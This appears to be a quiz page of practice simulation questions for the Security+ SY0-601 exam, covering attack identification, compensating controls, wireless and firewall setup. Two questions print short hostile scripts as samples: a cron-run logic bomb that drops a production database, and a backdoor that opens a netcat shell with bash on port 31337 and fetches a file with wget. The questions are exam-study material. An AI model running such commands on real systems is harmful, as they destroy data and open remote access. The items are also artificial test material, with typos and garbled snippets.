SY0-601 Simulations - Active untill 4 NOV 21

Target: Web server
 
Attack Description:
An attacker sends multiple syn packets from multiple sources.
 
Attack Idenfied?
Target: Web server
 
Attack Description:
An attacker sends multiple syn packets from multiple sources.
 
BEST Preventative or Remediation Action?
Target: User
 
Attack Description:
The attack established a connection, which allows remote commands to be executed.
 
Attack Idenfied?
Target: User
 
Attack Description:
The attack established a connection, which allows remote commands to be executed.
 
BEST Preventative or Remediation Action?
Target: Database server
 
Attack Description:
The attack is self propagating and compromises a SQL database using well-known credentials as it moves through the network.
 
Attack Idenfied?
Target: Database server
 
Attack Description:
The attack is self propagating and compromises a SQL database using well-known credentials as it moves through the network.
 
BEST Preventative or Remediation Action?
Target: Executive
 
Attack Description:
The attacker uses hadaware to remotely monitor a user's input activity to harvest credentials.
 
Attack Idenfied?
Target: Executive
 
Attack Description:
The attacker uses hadaware to remotely monitor a user's input activity to harvest credentials.
 
BEST Preventative or Remediation Action?
Target: Application
 
Attack Description:
The attacker embeds hidden access in internally developed application that bypasses account login.
 
Attack Idenfied?
Target: Application
 
Attack Description:
The attacker embeds hidden access in internally developed application that bypasses account login.
 
BEST Preventative or Remediation Action?
Identify the type of attack that is occurring on the network by clicking on the attacker's tablet and reviewing the output.
SQL Injection
Cross Site Scripting
XML Injection
Session Hijacking
Identify which compensating controls should be implemented on the:
Application Source Code Within Repository
 
Input Validation
Code Review
WAF
URL Filtering
Record Level Access control
None of the provided
Identify which compensating controls should be implemented on the:
CRM Server
Input Validation
Code Review
WAF
URL Filtering
Record Level Access control
None of the provided
Identify which compensating controls should be implemented on the:
Web Server
 
Input Validation
Code Review
WAF
URL Filtering
Record Level Access control
None of the provided
Identify which compensating controls should be implemented on the:
Database
Input Validation
Code Review
WAF
URL Filtering
Record Level Access control
None of the provided
Analyze the command oput and identify the type of compromise.
 
$ cat /var/log/www/file.sh
#!/bin/bash
 
user='grep john /etc/password'
if [ $user = ""]; then
mysql -u root -p mys3cr3tdbpw -e "drop database production"
fi
 
$ crontab 1
*/5 * * * * /var/log/www/file.sh
SQL Injection
RAT
Backdoor
Logic bomb
Rootkit
Analyze the command oput and identify the type of compromise.
 
$ cat /var/log/www/file.sh
#!/bin/bash
 
date=`date -%Y-%m-%y`
 
echo "typer in your full name: "
read loggedInName
nc -l -p 31337 -e /bin/bash
wget www.eicar.org/download/eicar.com.txt
echo "Hello, $loggedInName the virus file has been downloaded"
SQL Injection
RAT
Backdoor
Logic bomb
Rootkit
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.
 
The guest AD credentials are:
User: guest01
Password: guestpass
 
Enter the following items for the Wireless Client: SSID
 
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.
 
The guest AD credentials are:
User: guest01
Password: guestpass
 
Enter the following items for the Wireless Client: Username
 
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.
 
The guest AD credentials are:
User: guest01
Password: guestpass
 
Enter the following items for the Wireless Client: User password
 
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.
 
The guest AD credentials are:
User: guest01
Password: guestpass
 
Enter the following items for the Wireless Client: PSK
 
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.
 
The guest AD credentials are:
User: guest01
Password: guestpass
 
Enter the following items for the Wireless Client: Authentication type
 
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.
 
The guest AD credentials are:
User: guest01
Password: guestpass
 
Enter the following items for the RADIUS Server: Client IP
 
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.
 
The guest AD credentials are:
User: guest01
Password: guestpass
 
Enter the following items for the RADIUS Server: Authentication Type
 
 
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.
 
The guest AD credentials are:
User: guest01
Password: guestpass
 
Enter the following items for the WiFi Controller: Shared key
 
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.
 
The guest AD credentials are:
User: guest01
Password: guestpass
 
Enter the following items for the WiFi Controller: AAA server IP
 
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.
 
The guest AD credentials are:
User: guest01
Password: guestpass
 
Enter the following items for the WiFi Controller: PSK
 
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.
 
The guest AD credentials are:
User: guest01
Password: guestpass
 
Enter the following items for the WiFi Controller: Authentication Type
 
BONUS: Configure FIREWALL 1
 
Click on each firewall to do the following:
  • Deny cleartext .veb traffic.
  • Ensure secure management protocols are used.
  • Resolve issues at the DR site.
35
Source
DNS Rule
HTTPS Outbound
Management
HTTPS Inbound
HTTP Inbound
BONUS: Configure FIREWALL 1
 
Click on each firewall to do the following:
  • Deny cleartext .veb traffic.
  • Ensure secure management protocols are used.
  • Resolve issues at the DR site.
35
Destination
DNS Rule
HTTPS Outbound
Management
HTTPS Inbound
HTTP Inbound
BONUS: Configure FIREWALL 1
 
Click on each firewall to do the following:
  • Deny cleartext .veb traffic.
  • Ensure secure management protocols are used.
  • Resolve issues at the DR site.
35
Service
ACTION
DNS Rule
HTTPS Outbound
Management
HTTPS Inbound
HTTP Inbound
BONUS: Configure FIREWALL 1
 
Click on each firewall to do the following:
  • Deny cleartext .veb traffic.
  • Ensure secure management protocols are used.
  • Resolve issues at the DR site.
35
ACTION
DNS Rule
HTTPS Outbound
Management
HTTPS Inbound
HTTP Inbound
{"name":"SY0-601 Simulations - Active untill 4 NOV 21", "url":"https://www.quiz-maker.com/QPREVIEW","txt":"Target: Web server   Attack Description: An attacker sends multiple syn packets from multiple sources.   Attack Idenfied?, Target: Web server   Attack Description: An attacker sends multiple syn packets from multiple sources.   BEST Preventative or Remediation Action?, Target: User   Attack Description: The attack established a connection, which allows remote commands to be executed.   Attack Idenfied?","img":"https://www.quiz-maker.com/3012/CDN/82-3898092/33.png?sz=1200"}
Powered by: Quiz Maker